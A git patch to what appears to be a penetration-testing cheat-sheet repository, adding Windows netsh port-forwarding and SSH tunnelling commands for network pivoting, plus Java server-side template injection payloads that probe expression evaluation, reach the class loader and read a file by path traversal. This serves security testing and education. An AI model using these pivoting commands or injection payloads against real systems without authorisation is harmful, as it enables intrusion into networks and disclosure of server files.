From a7439d812de5d848a4e9f19525fbf2d6977607d6 Mon Sep 17 00:00:00 2001
From: Swissky <swisskysec@protonmail.com>
Date: Sat, 9 Jun 2018 18:56:19 +0200
Subject: [PATCH] Windows port forwarding - Netsh

---
 .../Network Pivoting Techniques.md            | 19 ++++++++++++++++---
 Server Side Template injections/README.md     |  5 +++++
 2 files changed, 21 insertions(+), 3 deletions(-)

diff --git a/Methodology and Resources/Network Pivoting Techniques.md b/Methodology and Resources/Network Pivoting Techniques.md
index b0e45ea..0c44974 100644
--- a/Methodology and Resources/Network Pivoting Techniques.md	
+++ b/Methodology and Resources/Network Pivoting Techniques.md	
@@ -1,9 +1,21 @@
 # Network Pivoting Techniques
 
+## Windows netsh Port Forwarding
+```powershell
+netsh interface portproxy add v4tov4 listenaddress=localaddress listenport=localport connectaddress=destaddress connectport=destport
+
+netsh interface portproxy add v4tov4 listenport=3340 listenaddress=10.1.1.110 connectport=3389 connectaddress=10.1.1.110
+```
+1. listenaddress – is a local IP address waiting for a connection.
+2. listenport – local listening TCP port (the connection is waited on it).
+3. connectaddress – is a local or remote IP address (or DNS name) to which the incoming connection will be redirected.
+4. connectport – is a TCP port to which the connection from listenport is forwarded to.
+
+
 ## SSH
 
 ### SOCKS Proxy
-```
+```bash
 ssh -D8080 [user]@[host]
 
 ssh -N -f -D 9000 [user]@[host]
@@ -12,13 +24,13 @@ ssh -N -f -D 9000 [user]@[host]
 ```
 
 ### Local Port Forwarding
-```
+```bash
 ssh -L [bindaddr]:[port]:[dsthost]:[dstport] [user]@[host]
 ```
 
 
 ### Remote Port Forwarding
-```
+```bash
 ssh -R [bindaddr]:[port]:[localhost]:[localport] [user]@[host]
 ```
 
@@ -98,3 +110,4 @@ python client.py --server-ip [server ip] --server-port 9443 --ntlm-proxy-ip [pro
 
 ## Thanks to
  * [Network Pivoting Techniques - Bit rot](https://bitrot.sh/cheatsheet/14-12-2017-pivoting/)
+ * [Port Forwarding in Windows - Windows OS Hub](http://woshub.com/port-forwarding-in-windows/)
diff --git a/Server Side Template injections/README.md b/Server Side Template injections/README.md
index b04d559..46ffe66 100644
--- a/Server Side Template injections/README.md	
+++ b/Server Side Template injections/README.md	
@@ -24,7 +24,11 @@ e.g:
 ## Java
 ### Basic injection
 ```java
+${7*7}
 ${{7*7}}
+${class.getClassLoader()}
+${class.getResource("").getPath()}
+${class.getResource("../../../../../index.htm").getContent()}
 ```
 
 ### Retrieve the system’s environment variables.
@@ -176,3 +180,4 @@ Inject this template
  * [Ruby ERB Template injection - TrustedSec](https://www.trustedsec.com/2017/09/rubyerb-template-injection/)
  * [Gist - Server-Side Template Injection - RCE For the Modern WebApp by James Kettle (PortSwigger)](https://gist.github.com/Yas3r/7006ec36ffb987cbfb98)
  * [PDF - Server-Side Template Injection: RCE for the modern webapp - @albinowax](https://www.blackhat.com/docs/us-15/materials/us-15-Kettle-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf)
+ * [VelocityServlet Expression Language injection](https://magicbluech.github.io/2017/12/02/VelocityServlet-Expression-language-Injection/)